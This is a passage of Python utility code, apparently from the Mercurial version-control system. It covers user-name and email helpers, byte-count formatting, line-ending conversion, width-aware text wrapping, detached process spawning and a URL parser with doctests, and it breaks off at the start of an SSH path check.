2610 2610 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2611 2611 ('literal', 'ABCDEFG', [False, False, True])
2612 2612 """
2613 2613 if pattern.startswith('re:'):
2614 2614 pattern = pattern[3:]
2615 2615 try:
2616 2616 flags = 0
2617 2617 if not casesensitive:
2618 2618 flags = remod.I
2619 2619 regex = remod.compile(pattern, flags)
2620 2620 except remod.error as e:
2621 2621 raise error.ParseError(_('invalid regular expression: %s')
2622 2622 % e)
2623 2623 return 're', pattern, regex.search
2624 2624 elif pattern.startswith('literal:'):
2625 2625 pattern = pattern[8:]
2626 2626
2627 2627 match = pattern.__eq__
2628 2628
2629 2629 if not casesensitive:
2630 2630 ipat = encoding.lower(pattern)
2631 2631 match = lambda s: ipat == encoding.lower(s)
2632 2632 return 'literal', pattern, match
2633 2633
2634 2634 def shortuser(user):
2635 2635 """Return a short representation of a user name or email address."""
2636 2636 f = user.find('@')
2637 2637 if f >= 0:
2638 2638 user = user[:f]
2639 2639 f = user.find('<')
2640 2640 if f >= 0:
2641 2641 user = user[f + 1:]
2642 2642 f = user.find(' ')
2643 2643 if f >= 0:
2644 2644 user = user[:f]
2645 2645 f = user.find('.')
2646 2646 if f >= 0:
2647 2647 user = user[:f]
2648 2648 return user
2649 2649
2650 2650 def emailuser(user):
2651 2651 """Return the user portion of an email address."""
2652 2652 f = user.find('@')
2653 2653 if f >= 0:
2654 2654 user = user[:f]
2655 2655 f = user.find('<')
2656 2656 if f >= 0:
2657 2657 user = user[f + 1:]
2658 2658 return user
2659 2659
2660 2660 def email(author):
2661 2661 '''get email of author.'''
2662 2662 r = author.find('>')
2663 2663 if r == -1:
2664 2664 r = None
2665 2665 return author[author.find('<') + 1:r]
2666 2666
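# Illustrative results for the three user/address helpers above:
#
#   >>> shortuser(b'Jane Doe <jane.doe@example.com>')
#   'jane'
#   >>> emailuser(b'Jane Doe <jane.doe@example.com>')
#   'jane.doe'
#   >>> email(b'Jane Doe <jane.doe@example.com>')
#   'jane.doe@example.com'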
2667 2667 def ellipsis(text, maxlength=400):
2668 2668 """Trim string to at most maxlength (default: 400) columns in display."""
2669 2669 return encoding.trim(text, maxlength, ellipsis='...')
2670 2670
2671 2671 def unitcountfn(*unittable):
2672 2672 '''return a function that renders a readable count of some quantity'''
2673 2673
2674 2674 def go(count):
2675 2675 for multiplier, divisor, format in unittable:
2676 2676 if abs(count) >= divisor * multiplier:
2677 2677 return format % (count / float(divisor))
2678 2678 return unittable[-1][2] % count
2679 2679
2680 2680 return go
2681 2681
2682 2682 def processlinerange(fromline, toline):
2683 2683 """Check that linerange <fromline>:<toline> makes sense and return a
2684 2684 0-based range.
2685 2685
2686 2686 >>> processlinerange(10, 20)
2687 2687 (9, 20)
2688 2688 >>> processlinerange(2, 1)
2689 2689 Traceback (most recent call last):
2690 2690 ...
2691 2691 ParseError: line range must be positive
2692 2692 >>> processlinerange(0, 5)
2693 2693 Traceback (most recent call last):
2694 2694 ...
2695 2695 ParseError: fromline must be strictly positive
2696 2696 """
2697 2697 if toline - fromline < 0:
2698 2698 raise error.ParseError(_("line range must be positive"))
2699 2699 if fromline < 1:
2700 2700 raise error.ParseError(_("fromline must be strictly positive"))
2701 2701 return fromline - 1, toline
2702 2702
2703 2703 bytecount = unitcountfn(
2704 2704 (100, 1 << 30, _('%.0f GB')),
2705 2705 (10, 1 << 30, _('%.1f GB')),
2706 2706 (1, 1 << 30, _('%.2f GB')),
2707 2707 (100, 1 << 20, _('%.0f MB')),
2708 2708 (10, 1 << 20, _('%.1f MB')),
2709 2709 (1, 1 << 20, _('%.2f MB')),
2710 2710 (100, 1 << 10, _('%.0f KB')),
2711 2711 (10, 1 << 10, _('%.1f KB')),
2712 2712 (1, 1 << 10, _('%.2f KB')),
2713 2713 (1, 1, _('%.0f bytes')),
2714 2714 )
2715 2715
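# Illustrative outputs of the generated bytecount() function (the unit labels
# pass through _() and may be translated):
#
#   >>> bytecount(50)
#   '50 bytes'
#   >>> bytecount(1234567)
#   '1.18 MB'
#   >>> bytecount(5 * (1 << 30))
#   '5.00 GB'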
2716 2716 class transformingwriter(object):
2717 2717 """Writable file wrapper to transform data by function"""
2718 2718
2719 2719 def __init__(self, fp, encode):
2720 2720 self._fp = fp
2721 2721 self._encode = encode
2722 2722
2723 2723 def close(self):
2724 2724 self._fp.close()
2725 2725
2726 2726 def flush(self):
2727 2727 self._fp.flush()
2728 2728
2729 2729 def write(self, data):
2730 2730 return self._fp.write(self._encode(data))
2731 2731
2732 2732 # Matches a single EOL which can either be a CRLF where repeated CR
2733 2733 # are removed or a LF. We do not care about old Macintosh files, so a
2734 2734 # stray CR is an error.
2735 2735 _eolre = remod.compile(br'\r*\n')
2736 2736
2737 2737 def tolf(s):
2738 2738 return _eolre.sub('\n', s)
2739 2739
2740 2740 def tocrlf(s):
2741 2741 return _eolre.sub('\r\n', s)
2742 2742
2743 2743 def _crlfwriter(fp):
2744 2744 return transformingwriter(fp, tocrlf)
2745 2745
2746 2746 if pycompat.oslinesep == '\r\n':
2747 2747 tonativeeol = tocrlf
2748 2748 fromnativeeol = tolf
2749 2749 nativeeolwriter = _crlfwriter
2750 2750 else:
2751 2751 tonativeeol = pycompat.identity
2752 2752 fromnativeeol = pycompat.identity
2753 2753 nativeeolwriter = pycompat.identity
2754 2754
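# Quick examples for the EOL helpers above; tonativeeol/fromnativeeol and
# nativeeolwriter are chosen from these based on pycompat.oslinesep, so their
# behaviour is platform dependent.
#
#   >>> tolf(b'a\r\nb\n')
#   'a\nb\n'
#   >>> tocrlf(b'a\nb\n')
#   'a\r\nb\r\n'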
2755 2755 def escapestr(s):
2756 2756 # call underlying function of s.encode('string_escape') directly for
2757 2757 # Python 3 compatibility
2758 2758 return codecs.escape_encode(s)[0]
2759 2759
2760 2760 def unescapestr(s):
2761 2761 return codecs.escape_decode(s)[0]
2762 2762
2763 2763 def forcebytestr(obj):
2764 2764 """Portably format an arbitrary object (e.g. exception) into a byte
2765 2765 string."""
2766 2766 try:
2767 2767 return pycompat.bytestr(obj)
2768 2768 except UnicodeEncodeError:
2769 2769 # non-ascii string, may be lossy
2770 2770 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2771 2771
2772 2772 def uirepr(s):
2773 2773 # Avoid double backslash in Windows path repr()
2774 2774 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2775 2775
2776 2776 # delay import of textwrap
2777 2777 def MBTextWrapper(**kwargs):
2778 2778 class tw(textwrap.TextWrapper):
2779 2779 """
2780 2780 Extend TextWrapper for width-awareness.
2781 2781
2782 2782 Neither the number of 'bytes' in any encoding nor the number of
2783 2783 'characters' is appropriate for calculating terminal columns of a given string.
2784 2784 
2785 2785 The original TextWrapper implementation uses the built-in 'len()' directly,
2786 2786 so overriding is needed to use the width information of each character.
2787 2787 
2788 2788 In addition, characters classified as 'ambiguous' width are
2789 2789 treated as wide in East Asian locales, but as narrow elsewhere.
2790 2790 
2791 2791 This requires a user decision to determine the width of such characters.
2792 2792 """
2793 2793 def _cutdown(self, ucstr, space_left):
2794 2794 l = 0
2795 2795 colwidth = encoding.ucolwidth
2796 2796 for i in xrange(len(ucstr)):
2797 2797 l += colwidth(ucstr[i])
2798 2798 if space_left < l:
2799 2799 return (ucstr[:i], ucstr[i:])
2800 2800 return ucstr, ''
2801 2801
2802 2802 # overriding of base class
2803 2803 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2804 2804 space_left = max(width - cur_len, 1)
2805 2805
2806 2806 if self.break_long_words:
2807 2807 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2808 2808 cur_line.append(cut)
2809 2809 reversed_chunks[-1] = res
2810 2810 elif not cur_line:
2811 2811 cur_line.append(reversed_chunks.pop())
2812 2812
2813 2813 # this overriding code is imported from TextWrapper of Python 2.6
2814 2814 # to calculate columns of string by 'encoding.ucolwidth()'
2815 2815 def _wrap_chunks(self, chunks):
2816 2816 colwidth = encoding.ucolwidth
2817 2817
2818 2818 lines = []
2819 2819 if self.width <= 0:
2820 2820 raise ValueError("invalid width %r (must be > 0)" % self.width)
2821 2821
2822 2822 # Arrange in reverse order so items can be efficiently popped
2823 2823 # from a stack of chunks.
2824 2824 chunks.reverse()
2825 2825
2826 2826 while chunks:
2827 2827
2828 2828 # Start the list of chunks that will make up the current line.
2829 2829 # cur_len is just the length of all the chunks in cur_line.
2830 2830 cur_line = []
2831 2831 cur_len = 0
2832 2832
2833 2833 # Figure out which static string will prefix this line.
2834 2834 if lines:
2835 2835 indent = self.subsequent_indent
2836 2836 else:
2837 2837 indent = self.initial_indent
2838 2838
2839 2839 # Maximum width for this line.
2840 2840 width = self.width - len(indent)
2841 2841
2842 2842 # First chunk on line is whitespace -- drop it, unless this
2843 2843 # is the very beginning of the text (i.e. no lines started yet).
2844 2844 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2845 2845 del chunks[-1]
2846 2846
2847 2847 while chunks:
2848 2848 l = colwidth(chunks[-1])
2849 2849
2850 2850 # Can at least squeeze this chunk onto the current line.
2851 2851 if cur_len + l <= width:
2852 2852 cur_line.append(chunks.pop())
2853 2853 cur_len += l
2854 2854
2855 2855 # Nope, this line is full.
2856 2856 else:
2857 2857 break
2858 2858
2859 2859 # The current line is full, and the next chunk is too big to
2860 2860 # fit on *any* line (not just this one).
2861 2861 if chunks and colwidth(chunks[-1]) > width:
2862 2862 self._handle_long_word(chunks, cur_line, cur_len, width)
2863 2863
2864 2864 # If the last chunk on this line is all whitespace, drop it.
2865 2865 if (self.drop_whitespace and
2866 2866 cur_line and cur_line[-1].strip() == r''):
2867 2867 del cur_line[-1]
2868 2868
2869 2869 # Convert current line back to a string and store it in list
2870 2870 # of all lines (return value).
2871 2871 if cur_line:
2872 2872 lines.append(indent + r''.join(cur_line))
2873 2873
2874 2874 return lines
2875 2875
2876 2876 global MBTextWrapper
2877 2877 MBTextWrapper = tw
2878 2878 return tw(**kwargs)
2879 2879
2880 2880 def wrap(line, width, initindent='', hangindent=''):
2881 2881 maxindent = max(len(hangindent), len(initindent))
2882 2882 if width <= maxindent:
2883 2883 # adjust for weird terminal size
2884 2884 width = max(78, maxindent + 1)
2885 2885 line = line.decode(pycompat.sysstr(encoding.encoding),
2886 2886 pycompat.sysstr(encoding.encodingmode))
2887 2887 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2888 2888 pycompat.sysstr(encoding.encodingmode))
2889 2889 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2890 2890 pycompat.sysstr(encoding.encodingmode))
2891 2891 wrapper = MBTextWrapper(width=width,
2892 2892 initial_indent=initindent,
2893 2893 subsequent_indent=hangindent)
2894 2894 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2895 2895
2896 2896 if (pyplatform.python_implementation() == 'CPython' and
2897 2897 sys.version_info < (3, 0)):
2898 2898 # There is an issue in CPython that some IO methods do not handle EINTR
2899 2899 # correctly. The following table shows what CPython version (and functions)
2900 2900 # are affected (buggy: has the EINTR bug, okay: otherwise):
2901 2901 #
2902 2902 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2903 2903 # --------------------------------------------------
2904 2904 # fp.__iter__ | buggy | buggy | okay
2905 2905 # fp.read* | buggy | okay [1] | okay
2906 2906 #
2907 2907 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2908 2908 #
2909 2909 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2910 2910 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2911 2911 #
2912 2912 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2913 2913 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2914 2914 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2915 2915 # fp.__iter__ but not other fp.read* methods.
2916 2916 #
2917 2917 # On modern systems like Linux, the "read" syscall cannot be interrupted
2918 2918 # when reading "fast" files like on-disk files. So the EINTR issue only
2919 2919 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2920 2920 # files approximately as "fast" files and use the fast (unsafe) code path,
2921 2921 # to minimize the performance impact.
2922 2922 if sys.version_info >= (2, 7, 4):
2923 2923 # fp.readline deals with EINTR correctly, use it as a workaround.
2924 2924 def _safeiterfile(fp):
2925 2925 return iter(fp.readline, '')
2926 2926 else:
2927 2927 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2928 2928 # note: this may block longer than necessary because of bufsize.
2929 2929 def _safeiterfile(fp, bufsize=4096):
2930 2930 fd = fp.fileno()
2931 2931 line = ''
2932 2932 while True:
2933 2933 try:
2934 2934 buf = os.read(fd, bufsize)
2935 2935 except OSError as ex:
2936 2936 # os.read only raises EINTR before any data is read
2937 2937 if ex.errno == errno.EINTR:
2938 2938 continue
2939 2939 else:
2940 2940 raise
2941 2941 line += buf
2942 2942 if '\n' in buf:
2943 2943 splitted = line.splitlines(True)
2944 2944 line = ''
2945 2945 for l in splitted:
2946 2946 if l[-1] == '\n':
2947 2947 yield l
2948 2948 else:
2949 2949 line = l
2950 2950 if not buf:
2951 2951 break
2952 2952 if line:
2953 2953 yield line
2954 2954
2955 2955 def iterfile(fp):
2956 2956 fastpath = True
2957 2957 if type(fp) is file:
2958 2958 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2959 2959 if fastpath:
2960 2960 return fp
2961 2961 else:
2962 2962 return _safeiterfile(fp)
2963 2963 else:
2964 2964 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2965 2965 def iterfile(fp):
2966 2966 return fp
2967 2967
2968 2968 def iterlines(iterator):
2969 2969 for chunk in iterator:
2970 2970 for line in chunk.splitlines():
2971 2971 yield line
2972 2972
2973 2973 def expandpath(path):
2974 2974 return os.path.expanduser(os.path.expandvars(path))
2975 2975
2976 2976 def hgcmd():
2977 2977 """Return the command used to execute current hg
2978 2978
2979 2979 This is different from hgexecutable() because on Windows we want
2980 2980 to avoid things opening new shell windows like batch files, so we
2981 2981 get either the python call or current executable.
2982 2982 """
2983 2983 if mainfrozen():
2984 2984 if getattr(sys, 'frozen', None) == 'macosx_app':
2985 2985 # Env variable set by py2app
2986 2986 return [encoding.environ['EXECUTABLEPATH']]
2987 2987 else:
2988 2988 return [pycompat.sysexecutable]
2989 2989 return gethgcmd()
2990 2990
2991 2991 def rundetached(args, condfn):
2992 2992 """Execute the argument list in a detached process.
2993 2993
2994 2994 condfn is a callable which is called repeatedly and should return
2995 2995 True once the child process is known to have started successfully.
2996 2996 At this point, the child process PID is returned. If the child
2997 2997 process fails to start or finishes before condfn() evaluates to
2998 2998 True, return -1.
2999 2999 """
3000 3000 # Windows case is easier because the child process is either
3001 3001 # successfully starting and validating the condition or exiting
3002 3002 # on failure. We just poll on its PID. On Unix, if the child
3003 3003 # process fails to start, it will be left in a zombie state until
3004 3004 # the parent wait on it, which we cannot do since we expect a long
3005 3005 # running process on success. Instead we listen for SIGCHLD telling
3006 3006 # us our child process terminated.
3007 3007 terminated = set()
3008 3008 def handler(signum, frame):
3009 3009 terminated.add(os.wait())
3010 3010 prevhandler = None
3011 3011 SIGCHLD = getattr(signal, 'SIGCHLD', None)
3012 3012 if SIGCHLD is not None:
3013 3013 prevhandler = signal.signal(SIGCHLD, handler)
3014 3014 try:
3015 3015 pid = spawndetached(args)
3016 3016 while not condfn():
3017 3017 if ((pid in terminated or not testpid(pid))
3018 3018 and not condfn()):
3019 3019 return -1
3020 3020 time.sleep(0.1)
3021 3021 return pid
3022 3022 finally:
3023 3023 if prevhandler is not None:
3024 3024 signal.signal(signal.SIGCHLD, prevhandler)
3025 3025
3026 3026 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
3027 3027 """Return the result of interpolating items in the mapping into string s.
3028 3028
3029 3029 prefix is a single character string, or a two character string with
3030 3030 a backslash as the first character if the prefix needs to be escaped in
3031 3031 a regular expression.
3032 3032
3033 3033 fn is an optional function that will be applied to the replacement text
3034 3034 just before replacement.
3035 3035
3036 3036 escape_prefix is an optional flag that allows using doubled prefix for
3037 3037 its escaping.
3038 3038 """
3039 3039 fn = fn or (lambda s: s)
3040 3040 patterns = '|'.join(mapping.keys())
3041 3041 if escape_prefix:
3042 3042 patterns += '|' + prefix
3043 3043 if len(prefix) > 1:
3044 3044 prefix_char = prefix[1:]
3045 3045 else:
3046 3046 prefix_char = prefix
3047 3047 mapping[prefix_char] = prefix_char
3048 3048 r = remod.compile(br'%s(%s)' % (prefix, patterns))
3049 3049 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
3050 3050
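# A hedged usage sketch: the prefix is spliced directly into a regular
# expression, so a character like '$' must be passed pre-escaped as described
# in the docstring above.
#
#   >>> interpolate(br'\$', {b'user': b'alice'}, b'hello $user')
#   'hello alice'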
3051 3051 def getport(port):
3052 3052 """Return the port for a given network service.
3053 3053
3054 3054 If port is an integer, it's returned as is. If it's a string, it's
3055 3055 looked up using socket.getservbyname(). If there's no matching
3056 3056 service, error.Abort is raised.
3057 3057 """
3058 3058 try:
3059 3059 return int(port)
3060 3060 except ValueError:
3061 3061 pass
3062 3062
3063 3063 try:
3064 3064 return socket.getservbyname(pycompat.sysstr(port))
3065 3065 except socket.error:
3066 3066 raise Abort(_("no port number associated with service '%s'") % port)
3067 3067
3068 3068 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
3069 3069 '0': False, 'no': False, 'false': False, 'off': False,
3070 3070 'never': False}
3071 3071
3072 3072 def parsebool(s):
3073 3073 """Parse s into a boolean.
3074 3074
3075 3075 If s is not a valid boolean, returns None.
3076 3076 """
3077 3077 return _booleans.get(s.lower(), None)
3078 3078
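# Small examples for the two option helpers above (getport() with a service
# name consults the local services database, so that case is environment
# dependent):
#
#   >>> parsebool(b'on'), parsebool(b'0'), parsebool(b'maybe')
#   (True, False, None)
#   >>> getport(b'8080')
#   8080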
3079 3079 _hextochr = dict((a + b, chr(int(a + b, 16)))
3080 3080 for a in string.hexdigits for b in string.hexdigits)
3081 3081
3082 3082 class url(object):
3083 3083 r"""Reliable URL parser.
3084 3084
3085 3085 This parses URLs and provides attributes for the following
3086 3086 components:
3087 3087
3088 3088 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
3089 3089
3090 3090 Missing components are set to None. The only exception is
3091 3091 fragment, which is set to '' if present but empty.
3092 3092
3093 3093 If parsefragment is False, fragment is included in query. If
3094 3094 parsequery is False, query is included in path. If both are
3095 3095 False, both fragment and query are included in path.
3096 3096
3097 3097 See http://www.ietf.org/rfc/rfc2396.txt for more information.
3098 3098
3099 3099 Note that for backward compatibility reasons, bundle URLs do not
3100 3100 take host names. That means 'bundle://../' has a path of '../'.
3101 3101
3102 3102 Examples:
3103 3103
3104 3104 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
3105 3105 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
3106 3106 >>> url(b'ssh://[::1]:2200//home/joe/repo')
3107 3107 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
3108 3108 >>> url(b'file:///home/joe/repo')
3109 3109 <url scheme: 'file', path: '/home/joe/repo'>
3110 3110 >>> url(b'file:///c:/temp/foo/')
3111 3111 <url scheme: 'file', path: 'c:/temp/foo/'>
3112 3112 >>> url(b'bundle:foo')
3113 3113 <url scheme: 'bundle', path: 'foo'>
3114 3114 >>> url(b'bundle://../foo')
3115 3115 <url scheme: 'bundle', path: '../foo'>
3116 3116 >>> url(br'c:\foo\bar')
3117 3117 <url path: 'c:\\foo\\bar'>
3118 3118 >>> url(br'\\blah\blah\blah')
3119 3119 <url path: '\\\\blah\\blah\\blah'>
3120 3120 >>> url(br'\\blah\blah\blah#baz')
3121 3121 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3122 3122 >>> url(br'file:///C:\users\me')
3123 3123 <url scheme: 'file', path: 'C:\\users\\me'>
3124 3124
3125 3125 Authentication credentials:
3126 3126
3127 3127 >>> url(b'ssh://joe:xyz@x/repo')
3128 3128 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3129 3129 >>> url(b'ssh://joe@x/repo')
3130 3130 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3131 3131
3132 3132 Query strings and fragments:
3133 3133
3134 3134 >>> url(b'http://host/a?b#c')
3135 3135 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3136 3136 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3137 3137 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3138 3138
3139 3139 Empty path:
3140 3140
3141 3141 >>> url(b'')
3142 3142 <url path: ''>
3143 3143 >>> url(b'#a')
3144 3144 <url path: '', fragment: 'a'>
3145 3145 >>> url(b'http://host/')
3146 3146 <url scheme: 'http', host: 'host', path: ''>
3147 3147 >>> url(b'http://host/#a')
3148 3148 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3149 3149
3150 3150 Only scheme:
3151 3151
3152 3152 >>> url(b'http:')
3153 3153 <url scheme: 'http'>
3154 3154 """
3155 3155
3156 3156 _safechars = "!~*'()+"
3157 3157 _safepchars = "/!~*'()+:\\"
3158 3158 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
3159 3159
3160 3160 def __init__(self, path, parsequery=True, parsefragment=True):
3161 3161 # We slowly chomp away at path until we have only the path left
3162 3162 self.scheme = self.user = self.passwd = self.host = None
3163 3163 self.port = self.path = self.query = self.fragment = None
3164 3164 self._localpath = True
3165 3165 self._hostport = ''
3166 3166 self._origpath = path
3167 3167
3168 3168 if parsefragment and '#' in path:
3169 3169 path, self.fragment = path.split('#', 1)
3170 3170
3171 3171 # special case for Windows drive letters and UNC paths
3172 3172 if hasdriveletter(path) or path.startswith('\\\\'):
3173 3173 self.path = path
3174 3174 return
3175 3175
3176 3176 # For compatibility reasons, we can't handle bundle paths as
3177 3177 # normal URLS
3178 3178 if path.startswith('bundle:'):
3179 3179 self.scheme = 'bundle'
3180 3180 path = path[7:]
3181 3181 if path.startswith('//'):
3182 3182 path = path[2:]
3183 3183 self.path = path
3184 3184 return
3185 3185
3186 3186 if self._matchscheme(path):
3187 3187 parts = path.split(':', 1)
3188 3188 if parts[0]:
3189 3189 self.scheme, path = parts
3190 3190 self._localpath = False
3191 3191
3192 3192 if not path:
3193 3193 path = None
3194 3194 if self._localpath:
3195 3195 self.path = ''
3196 3196 return
3197 3197 else:
3198 3198 if self._localpath:
3199 3199 self.path = path
3200 3200 return
3201 3201
3202 3202 if parsequery and '?' in path:
3203 3203 path, self.query = path.split('?', 1)
3204 3204 if not path:
3205 3205 path = None
3206 3206 if not self.query:
3207 3207 self.query = None
3208 3208
3209 3209 # // is required to specify a host/authority
3210 3210 if path and path.startswith('//'):
3211 3211 parts = path[2:].split('/', 1)
3212 3212 if len(parts) > 1:
3213 3213 self.host, path = parts
3214 3214 else:
3215 3215 self.host = parts[0]
3216 3216 path = None
3217 3217 if not self.host:
3218 3218 self.host = None
3219 3219 # path of file:///d is /d
3220 3220 # path of file:///d:/ is d:/, not /d:/
3221 3221 if path and not hasdriveletter(path):
3222 3222 path = '/' + path
3223 3223
3224 3224 if self.host and '@' in self.host:
3225 3225 self.user, self.host = self.host.rsplit('@', 1)
3226 3226 if ':' in self.user:
3227 3227 self.user, self.passwd = self.user.split(':', 1)
3228 3228 if not self.host:
3229 3229 self.host = None
3230 3230
3231 3231 # Don't split on colons in IPv6 addresses without ports
3232 3232 if (self.host and ':' in self.host and
3233 3233 not (self.host.startswith('[') and self.host.endswith(']'))):
3234 3234 self._hostport = self.host
3235 3235 self.host, self.port = self.host.rsplit(':', 1)
3236 3236 if not self.host:
3237 3237 self.host = None
3238 3238
3239 3239 if (self.host and self.scheme == 'file' and
3240 3240 self.host not in ('localhost', '127.0.0.1', '[::1]')):
3241 3241 raise Abort(_('file:// URLs can only refer to localhost'))
3242 3242
3243 3243 self.path = path
3244 3244
3245 3245 # leave the query string escaped
3246 3246 for a in ('user', 'passwd', 'host', 'port',
3247 3247 'path', 'fragment'):
3248 3248 v = getattr(self, a)
3249 3249 if v is not None:
3250 3250 setattr(self, a, urlreq.unquote(v))
3251 3251
3252 3252 @encoding.strmethod
3253 3253 def __repr__(self):
3254 3254 attrs = []
3255 3255 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
3256 3256 'query', 'fragment'):
3257 3257 v = getattr(self, a)
3258 3258 if v is not None:
3259 3259 attrs.append('%s: %r' % (a, v))
3260 3260 return '<url %s>' % ', '.join(attrs)
3261 3261
3262 3262 def __bytes__(self):
3263 3263 r"""Join the URL's components back into a URL string.
3264 3264
3265 3265 Examples:
3266 3266
3267 3267 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3268 3268 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3269 3269 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3270 3270 'http://user:pw@host:80/?foo=bar&baz=42'
3271 3271 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3272 3272 'http://user:pw@host:80/?foo=bar%3dbaz'
3273 3273 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3274 3274 'ssh://user:pw@[::1]:2200//home/joe#'
3275 3275 >>> bytes(url(b'http://localhost:80//'))
3276 3276 'http://localhost:80//'
3277 3277 >>> bytes(url(b'http://localhost:80/'))
3278 3278 'http://localhost:80/'
3279 3279 >>> bytes(url(b'http://localhost:80'))
3280 3280 'http://localhost:80/'
3281 3281 >>> bytes(url(b'bundle:foo'))
3282 3282 'bundle:foo'
3283 3283 >>> bytes(url(b'bundle://../foo'))
3284 3284 'bundle:../foo'
3285 3285 >>> bytes(url(b'path'))
3286 3286 'path'
3287 3287 >>> bytes(url(b'file:///tmp/foo/bar'))
3288 3288 'file:///tmp/foo/bar'
3289 3289 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3290 3290 'file:///c:/tmp/foo/bar'
3291 3291 >>> print(url(br'bundle:foo\bar'))
3292 3292 bundle:foo\bar
3293 3293 >>> print(url(br'file:///D:\data\hg'))
3294 3294 file:///D:\data\hg
3295 3295 """
3296 3296 if self._localpath:
3297 3297 s = self.path
3298 3298 if self.scheme == 'bundle':
3299 3299 s = 'bundle:' + s
3300 3300 if self.fragment:
3301 3301 s += '#' + self.fragment
3302 3302 return s
3303 3303
3304 3304 s = self.scheme + ':'
3305 3305 if self.user or self.passwd or self.host:
3306 3306 s += '//'
3307 3307 elif self.scheme and (not self.path or self.path.startswith('/')
3308 3308 or hasdriveletter(self.path)):
3309 3309 s += '//'
3310 3310 if hasdriveletter(self.path):
3311 3311 s += '/'
3312 3312 if self.user:
3313 3313 s += urlreq.quote(self.user, safe=self._safechars)
3314 3314 if self.passwd:
3315 3315 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3316 3316 if self.user or self.passwd:
3317 3317 s += '@'
3318 3318 if self.host:
3319 3319 if not (self.host.startswith('[') and self.host.endswith(']')):
3320 3320 s += urlreq.quote(self.host)
3321 3321 else:
3322 3322 s += self.host
3323 3323 if self.port:
3324 3324 s += ':' + urlreq.quote(self.port)
3325 3325 if self.host:
3326 3326 s += '/'
3327 3327 if self.path:
3328 3328 # TODO: similar to the query string, we should not unescape the
3329 3329 # path when we store it, the path might contain '%2f' = '/',
3330 3330 # which we should *not* escape.
3331 3331 s += urlreq.quote(self.path, safe=self._safepchars)
3332 3332 if self.query:
3333 3333 # we store the query in escaped form.
3334 3334 s += '?' + self.query
3335 3335 if self.fragment is not None:
3336 3336 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3337 3337 return s
3338 3338
3339 3339 __str__ = encoding.strmethod(__bytes__)
3340 3340
3341 3341 def authinfo(self):
3342 3342 user, passwd = self.user, self.passwd
3343 3343 try:
3344 3344 self.user, self.passwd = None, None
3345 3345 s = bytes(self)
3346 3346 finally:
3347 3347 self.user, self.passwd = user, passwd
3348 3348 if not self.user:
3349 3349 return (s, None)
3350 3350 # authinfo[1] is passed to the urllib2 password manager, and its
3351 3351 # URIs must not contain credentials. The host is passed in the
3352 3352 # URIs list because Python < 2.4.3 uses only that to search for
3353 3353 # a password.
3354 3354 return (s, (None, (s, self.host),
3355 3355 self.user, self.passwd or ''))
3356 3356
3357 3357 def isabs(self):
3358 3358 if self.scheme and self.scheme != 'file':
3359 3359 return True # remote URL
3360 3360 if hasdriveletter(self.path):
3361 3361 return True # absolute for our purposes - can't be joined()
3362 3362 if self.path.startswith(br'\\'):
3363 3363 return True # Windows UNC path
3364 3364 if self.path.startswith('/'):
3365 3365 return True # POSIX-style
3366 3366 return False
3367 3367
3368 3368 def localpath(self):
3369 3369 if self.scheme == 'file' or self.scheme == 'bundle':
3370 3370 path = self.path or '/'
3371 3371 # For Windows, we need to promote hosts containing drive
3372 3372 # letters to paths with drive letters.
3373 3373 if hasdriveletter(self._hostport):
3374 3374 path = self._hostport + '/' + self.path
3375 3375 elif (self.host is not None and self.path
3376 3376 and not hasdriveletter(path)):
3377 3377 path = '/' + path
3378 3378 return path
3379 3379 return self._origpath
3380 3380
3381 3381 def islocal(self):
3382 3382 '''whether localpath will return something that posixfile can open'''
3383 3383 return (not self.scheme or self.scheme == 'file'
3384 3384 or self.scheme == 'bundle')
3385 3385
3386 3386 def hasscheme(path):
3387 3387 return bool(url(path).scheme)
3388 3388
3389 3389 def hasdriveletter(path):
3390 3390 return path and path[1:2] == ':' and path[0:1].isalpha()
3391 3391
3392 3392 def urllocalpath(path):
3393 3393 return url(path, parsequery=False, parsefragment=False).localpath()
3394 3394
3395 3395 def checksafessh(path):
